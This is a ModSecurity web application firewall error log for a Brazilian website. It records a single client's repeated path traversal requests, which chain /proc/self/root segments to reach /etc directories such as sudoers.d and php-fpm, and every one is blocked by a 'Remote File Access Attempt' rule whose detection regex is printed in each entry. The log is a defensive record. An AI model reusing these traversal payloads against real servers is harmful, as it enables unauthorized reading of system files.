[Fri Mar 20 09:49:25.475759 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:40222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CVRCii7xarUs8iHZ-hAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:30.056844 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:40228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CWhCii7xarUs8iHZ-iwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:35.537766 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:43274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CXzJ3M9BSuKP7CAY3qgAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:37.088932 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:43284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CYda6ubjKNq_cu4bwLgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:48.327978 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:43300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CbNa6ubjKNq_cu4bwQAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:49:59.982969 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:36960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cd9a6ubjKNq_cu4bwWgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:03.337003 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:34478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ce_qxLDW4GITHUkT_-wAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:07.116883 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:34494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cf11pVZ5mVmJwsFNHhwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:12.281244 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.244.43:47026] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1ChPqxLDW4GITHUkQABAAAAQ4"]
[Fri Mar 20 09:50:17.293161 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:34500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CifHIg5MgXLBnicMOXwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:18.730817 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:43010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CivXLqtnMIWvjpaKxDgAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:23.024311 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:45868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cjl1pVZ5mVmJwsFNHlgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:40.228493 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:45874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CoDJ3M9BSuKP7CAY39AAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:42.962106 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:38394] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CoV1pVZ5mVmJwsFNHnAAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:45.618576 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:38410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cpda6ubjKNq_cu4bwewAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:46.933999 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:38412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cpl1pVZ5mVmJwsFNHoQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:49.694570 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:38422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CqOoXxyEfFpUF8f-XggAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:51.120525 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:32964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CqzJ3M9BSuKP7CAY4CQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:52.475950 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:32972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CrLninkcc-iUj5Ap04gAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:53.746843 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:32982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1CrfqxLDW4GITHUkQAIAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:55.053296 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:32984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Cr_HIg5MgXLBnicMOcQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:58.482782 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:32996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Csta6ubjKNq_cu4bwggAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:50:58.947059 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:32996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Csta6ubjKNq_cu4bwgwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
